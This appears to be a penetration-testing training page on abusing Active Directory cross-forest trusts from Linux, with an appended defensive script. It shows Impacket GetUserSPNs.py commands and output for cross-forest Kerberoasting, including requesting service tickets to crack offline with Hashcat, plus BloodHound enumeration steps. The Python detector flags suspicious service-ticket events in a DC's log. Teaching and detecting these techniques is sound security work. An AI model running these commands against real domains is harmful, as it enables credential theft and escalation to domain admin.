Cross-Forest Trust Abuse From Linux
Cross-Forest Kerberoasting
Just like with Windows, we can perform similar operations from a Linux attack host.
Using GetUserSPNs.py
We need credentials for a user who can authenticate to the other domain, which we specify with the -target-domain flag.
GetUserSPNs.py -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley
Impacket v0.9.25.dev1+20220311.121550.1271d369 - Copyright 2021 SecureAuth Corporation
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
----------------------------------- -------- ------------------------------------------------------ -------------------------- --------- ----------
MSSQLsvc/sql01.freightlogstics:1433 mssqlsvc CN=Domain Admins,CN=Users,DC=FREIGHTLOGISTICS,DC=LOCAL 2022-03-24 15:47:52.488917 <never>
We can use the -request flag to give us the TGS ticket and the -outputfile flag to save it directly to a file, which we could then attempt to crack offline with Hashcat mode 13100.
GetUserSPNs.py -request -outputfile tgs.hash -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley
Hunting Foreign Group Membership
From the last section, we saw that we may see users or admins from one domain as members of a group in another domain. On Linux, we can gather this information using bloodhound-python to collect data from multiple domains.
Adding DOMAIN Information to /etc/resolv.conf
We may need to refer to the targeted DC by its DNS hostname instead of an IP address, so we can edit our /etc/resolv.conf file like below to achieve this.
Running bloodhound-python Against INLANEFREIGHT.LOCAL
Compressing the File
Viewing Dangerous Rights in BloodHound
Once we upload our data, we can click on Users with Foreign Domain Group Membership under the Analysis tab and select the source domain as INLANEFREIGHT.LOCAL.
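For the defending side of the cross-forest Kerberoasting request shown earlier, the sketch below reviews service-ticket events (Windows Security event 4769) logged by a FREIGHTLOGISTICS.LOCAL DC. It is an added example, not part of the original notes; the dict layout, the user jdoe, the IP address, and all sample events are constructed assumptions.

```python
# Added example: review Windows Security event 4769 (service ticket requested) on a
# FREIGHTLOGISTICS.LOCAL DC for the request pattern shown on this page.
# Assumption: events are already parsed into dicts keyed by 4769 EventData field names.
LOCAL_REALM = "FREIGHTLOGISTICS.LOCAL"  # realm of the DC whose log is reviewed
RC4_HMAC = 0x17  # etype 23, the ticket type Hashcat mode 13100 applies to

def _ev(user, service, etype, status="0x0"):
    """Build one constructed 4769 record."""
    return {"EventID": 4769, "TargetUserName": user, "ServiceName": service,
            "TicketEncryptionType": etype, "Status": status,
            "IpAddress": "::ffff:192.0.2.50"}

# Constructed sample events, not real log data (jdoe is a hypothetical local user).
SAMPLE_EVENTS = [
    _ev("wley@INLANEFREIGHT.LOCAL", "mssqlsvc", "0x17"),     # foreign user, RC4, user SPN
    _ev("wley@INLANEFREIGHT.LOCAL", "SQL01$", "0x12"),       # machine account, AES
    _ev("jdoe@FREIGHTLOGISTICS.LOCAL", "mssqlsvc", "0x17"),  # local user, RC4
    _ev("jdoe@FREIGHTLOGISTICS.LOCAL", "mssqlsvc", "0x12"),  # local user, AES
    _ev("wley@INLANEFREIGHT.LOCAL", "krbtgt", "0x17"),       # krbtgt, ignored
    _ev("wley@INLANEFREIGHT.LOCAL", "mssqlsvc", "0xffffffff", status="0x1b"),  # failed
]

def classify(event, local_realm=LOCAL_REALM):
    """Return the Kerberoasting indicators present in one 4769 event."""
    if event.get("EventID") != 4769 or event.get("Status") != "0x0":
        return []  # only successful ticket issuance matters here
    service = event.get("ServiceName", "")
    # Machine accounts (trailing '$') and krbtgt have long random keys,
    # so tickets for them are not useful for offline password guessing.
    if service.endswith("$") or service.lower() == "krbtgt":
        return []
    reasons = []
    if int(event.get("TicketEncryptionType", "0"), 16) == RC4_HMAC:
        reasons.append("rc4-ticket")
    _, _, realm = event.get("TargetUserName", "").partition("@")
    if realm and realm.upper() != local_realm.upper():
        reasons.append("foreign-realm-requester")
    return reasons

def hunt(events, local_realm=LOCAL_REALM):
    """Return (requester, service, reasons) tuples, strongest matches first."""
    hits = [(e["TargetUserName"], e["ServiceName"], classify(e, local_realm))
            for e in events]
    return sorted((h for h in hits if h[2]), key=lambda h: -len(h[2]))

if __name__ == "__main__":
    for requester, service, reasons in hunt(SAMPLE_EVENTS):
        print(f"{requester} -> {service}: {', '.join(reasons)}")
```

A hit with both indicators on an account such as mssqlsvc, which the output above shows as a member of Domain Admins, is the one to triage first.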
